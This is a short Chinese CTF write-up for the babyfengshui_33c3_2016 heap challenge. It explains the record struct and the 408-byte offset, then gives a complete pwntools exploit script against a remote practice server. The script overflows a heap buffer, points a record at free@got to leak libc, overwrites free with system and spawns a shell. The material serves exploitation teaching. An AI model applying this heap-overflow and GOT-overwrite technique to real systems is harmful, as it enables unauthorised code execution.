本题主要就是看懂一条判断溢出的if语句
结构体是怎么看出来的
-
代码上看
struct{ char *text; char name[124]; }
-
从内存上看
思路
step4 中的 408 是哪里来的
- 在调试器里查看内存地址，计算 chunk3 的 content 起始处到 chunk1 的 struct 之间的距离即可（本题为 408 字节）
exp
from pwn import *
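# Target setup.  `python exp.py LOCAL` runs the binary locally (pwntools' `args`
# parses that from the command line); the default is the remote instance.
BINARY = './babyfengshui_33c3_2016'
elf = ELF(BINARY)
# Bind the ELF to the context so arch/bits (32-bit) are taken from the target
# instead of relying on pwntools' defaults; p32/u32 below assume a 32-bit target.
context.binary = elf
context.log_level = 'debug'
p = process(BINARY) if args.LOCAL else remote('node3.buuoj.cn', 29853)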
def add(size, name, length, text):
    """Menu action 0: create a user record.

    Answers the binary's prompts in order: description size, name, text
    length, text.  Numeric fields are sent as decimal strings; ``name`` and
    ``text`` are passed through to ``sendlineafter`` unchanged.
    """
    answers = [
        ('Action: ', str(0)),
        ('size of description: ', str(size)),
        ('name: ', name),
        ('text length: ', str(length)),
        ('text: ', text),
    ]
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
def free(index):
    """Menu action 1: delete the user record at ``index``."""
    for prompt, reply in (('Action: ', str(1)), ('index: ', str(index))):
        p.sendlineafter(prompt, reply)
def update(index, length, text):
    """Menu action 3: replace the text of the user record at ``index``.

    ``length`` is sent to the binary's length prompt exactly as given; the
    caller chooses it independently of ``len(text)``.
    """
    choice, idx, size = str(3), str(index), str(length)
    p.sendlineafter('Action: ', choice)
    p.sendlineafter('index: ', idx)
    p.sendlineafter('text length: ', size)
    p.sendlineafter('text: ', text)
def show(index):
    """Menu action 2: ask the binary to print the record at ``index``.

    Only sends the request; reading the printed output is left to the caller.
    """
    replies = [('Action: ', str(2)), ('index: ', str(index))]
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)
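from LibcSearcher import *

# Distance from user 3's text buffer to user 1's struct, measured from the
# heap layout in the debugger; the overflow in step 4 must cover exactly this
# much before the new text pointer is written.
OVERFLOW_PAD = 408

# step 1: create three users.  User 2's text is the string that will be
# handed to system() once free@got has been redirected.
add(0x80, 'huzai', 0x78, 'aaa')
add(0x80, 'huzai', 0x78, 'ccc')
add(0x80, 'huzai', 0x78, '/bin/sh\x00')
# step 2: free user 0 so its chunks return to the allocator
free(0)
# step 3: request a larger description; it becomes user 3
add(0x100, 'hzuai222', 0x98, 'dddd')
# step 4: write past user 3's text into user 1's struct and point its text
# pointer at free@got
update(3, 0x200, b'a' * OVERFLOW_PAD + p32(elf.got['free']))
# step 5: showing user 1 now prints the GOT entry, i.e. the libc address of free
show(1)
p.recvuntil('description: ')
# recvn: block until exactly four bytes arrive; recv(4) may return fewer on a
# slow link and u32 then raises.
free_addr = u32(p.recvn(4))
libc = LibcSearcher('free', free_addr)
libc_base = free_addr - libc.dump('free')
system_addr = libc_base + libc.dump('system')
log.success('free@libc = %#x, libc base = %#x, system = %#x'
            % (free_addr, libc_base, system_addr))
# step 6: user 1's text pointer still aims at free@got, so updating user 1
# overwrites the GOT slot with system.  User 2's text already holds
# "/bin/sh\0" from step 1.
update(1, 0x4, p32(system_addr))
# step 7: freeing user 2 calls free(text), which is now system("/bin/sh")
free(2)
p.interactive()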